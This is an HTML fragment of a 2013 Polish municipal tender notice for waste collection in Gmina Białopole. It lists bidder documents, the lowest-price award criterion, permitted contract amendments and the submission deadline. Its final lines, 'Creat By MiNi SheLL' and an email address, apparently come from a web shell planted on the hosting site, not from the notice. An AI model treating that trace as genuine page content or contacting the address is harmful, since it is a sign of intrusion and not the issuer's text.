<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany i może być dopuszczalna tylko w granicach unormowania art. 144 ustawy Prawo Zamówień Publicznych :
2. Zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy, w szczególności ustawy z dnia 13.09.1996 r. o utrzymaniu czystości i porządku w gminach oraz uchwał Rady Gminy Białopole podjętych na podstawie powyższej ustawy,
3. Wystąpienia urzędowej zmiany stawki podatku VAT zaistniałej po dacie zawarcia umowy co spowoduje zmianę kwoty brutto do końca realizacji umowy ,
4. W zakresie zmiany częstotliwości odbioru odpadów, rodzaju i ilości frakcji odbieranych odpadów w przypadku zmiany Regulaminu utrzymania czystości i porządku na terenie Gminy Białopole.
5. Niedopuszczalna jest jednak zmiana postanowień zawartej umowy oraz wprowadzanie nowych postanowień do umowy niekorzystnych dla Zamawiającego, jeżeli przy ich uwzględnieniu należałoby zmieniać treść oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.ugbialopole.bip.lubelskie.pl/index.php?id=6<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Białopolu, 22-135 Białopole, ul. Chełmska 1 pok. Nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2013 godzina 09:00, miejsce: Urząd Gminy w Białopolu, 22-135 Białopole, ul. Chełmska 1 pok. Nr 17 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com